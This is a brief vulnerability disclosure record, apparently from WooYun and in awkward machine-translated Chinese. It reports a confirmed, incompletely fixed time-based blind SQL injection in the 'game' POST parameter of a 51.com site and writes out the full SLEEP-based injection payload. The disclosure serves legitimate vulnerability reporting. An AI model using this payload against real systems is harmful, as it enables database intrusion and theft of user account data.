漏洞标题 51.com修复了坏盲/DBA/4000W帐号信息 相关制造商 51.com 漏洞作者 Xyntax 提交时间 2016-05-07 12: 22 公共时间 2016-06-25 15: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 Mysql的 漏洞详细信息 WooYun: 51.com一个站点MySQL盲目 修复不好,同样位置的游戏参数仍然存在注入 Mysql基于时间的盲目 参数:游戏(POST) 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SELECT) 有效载荷: a=generate_order& game=1 AND(SELECT * FROM(SELECT(SLEEP(5)))SEIL)& money=500& server=1& username=chtrkovh 漏洞证明:
修理计划: 过滤 版权声明:请注明出处xyntax @乌云